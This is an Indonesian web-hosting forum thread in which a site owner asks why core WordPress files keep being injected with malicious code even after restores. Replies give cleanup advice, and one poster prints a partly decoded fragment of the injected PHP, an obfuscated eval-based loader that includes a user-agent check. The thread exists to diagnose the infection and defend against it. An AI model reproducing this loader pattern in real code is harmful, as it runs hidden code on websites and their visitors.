File Wordpress Di-Inject Malicious Code

Discussion in 'Dedicated Server dan Colocation' started by Zhad, 3 Jun 2015.

Thread Status:
Not open for further replies.
  1. Zhad

    Zhad Poster 1.0

    Messages:
    53
    Likes Received:
    1
    Trophy Points:
    8
    Hi Rekan-rekan DWH
    Salah satu akun di DS saya, websitenya berbasis website, dan file-file pentingnya diinject kode aneh di awal baris kode file.
    Plugin jadi ga kedetek dari dashboard.
    Kode2 ini ada di php2 pilar wordpress kayak wp-config.php

    Kodenya :



    Sudah direstore ke normal
    Update Salt, WP, Theme, Plugin
    Kena2 lagi

    Kenapa ya?

    Trims
     
  2. Zhad

    Zhad Poster 1.0

    Messages:
    53
    Likes Received:
    1
    Trophy Points:
    8
    Ini kode yang diinjek

    <?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER[ ....
     

    Attached Files:

  3. BikinDesainSitus

    BikinDesainSitus Hosting Guru

    Messages:
    1,425
    Likes Received:
    84
    Trophy Points:
    48
    saran saya.
    1. export tulisan dan page via dashbord
    2. copy / download file image di wp-content (Pastikan benar2 file image)
    3. hapus seluruh file
    4. install ulang
    5. install plugin itthemes security (dengan segala settingnya)
    6. import hasila export tadi
    7. upload file image wp-content

    done...

    backup !!
     
  4. mustafaramadhan

    mustafaramadhan Hosting Guru

    Messages:
    3,237
    Likes Received:
    857
    Trophy Points:
    113
  5. dhyhost

    dhyhost Hosting Guru Web Hosting

    Messages:
    3,926
    Likes Received:
    613
    Trophy Points:
    113
    wp-config, biar aman coba diganti aja permissionnya ke 440 atau 400
     
  6. slepetan

    slepetan Beginner 2.0

    Messages:
    26
    Likes Received:
    2
    Trophy Points:
    3
    penasaran.. kira2 apa yang dilakukan script ini ya? :39:
    Yang awal:
    Code:
    <?php
    if (!isset($GLOBALS["anuna"])) {
        $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
        if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1;
    }
    ?>
    yang akhir..
    Code:
    $gubpbmvvqg = substr($rbzjgsiwbp, (45484 - 35378), (32 - 25));
    if (!function_exists('hlzppruxlh')) {
        function hlzppruxlh($qvwxxucpoi, $jmqimpctxe) {
            $lbtiwvkexa = NULL;
            for ($xsnvcjahjp = 0;$xsnvcjahjp < (sizeof($qvwxxucpoi) / 2);$xsnvcjahjp++) {
                $lbtiwvkexa.= substr($jmqimpctxe, $qvwxxucpoi[($xsnvcjahjp * 2) ], $qvwxxucpoi[($xsnvcjahjp * 2) + 1]);
            }
            return $lbtiwvkexa;
        };
    }
    $fmdfhaflgb = " /* zsphxgrgor */ eval(str_replace(chr((153-116)), chr((517-425)), hlzppruxlh($hnoyopqjwg,$rbzjgsiwbp))); /* qdwduicxmi */ ";
    $syumqqgzyd = substr($rbzjgsiwbp, (44524 - 34411), (64 - 52));
    $syumqqgzyd($gubpbmvvqg, $fmdfhaflgb, NULL);
    $syumqqgzyd = $fmdfhaflgb;
    $syumqqgzyd = (525 - 404);
    $rbzjgsiwbp = $syumqqgzyd - 1;
    ?>

    Bagian tengah masih menjadi misteri.. :39:
     
  7. Zhad

    Zhad Poster 1.0

    Messages:
    53
    Likes Received:
    1
    Trophy Points:
    8
    File image itu seperti apa ya?
    di wp-content juga pada kena inject

    Hasilnya seperti ini pak -> http://www.diskusiwebhosting.com/threads/file-wordpress-di-inject-malicious-code.16820/#post-144429

    Cuma ga ngarti itu kode ngapain

    Kalau file-file lain permissionnya berapa? Std kan 755
     
  8. mustafaramadhan

    mustafaramadhan Hosting Guru

    Messages:
    3,237
    Likes Received:
    857
    Trophy Points:
    113
  9. dhyhost

    dhyhost Hosting Guru Web Hosting

    Messages:
    3,926
    Likes Received:
    613
    Trophy Points:
    113
  10. Zhad

    Zhad Poster 1.0

    Messages:
    53
    Likes Received:
    1
    Trophy Points:
    8
    @^ udah sih habis restore ulang, tapi kena lagi, uniknya last modified di cpanel, ga berubah, tapi filenya udah diinject kode2 tersebut
     
Loading...
Thread Status:
Not open for further replies.

Share This Page

Loading...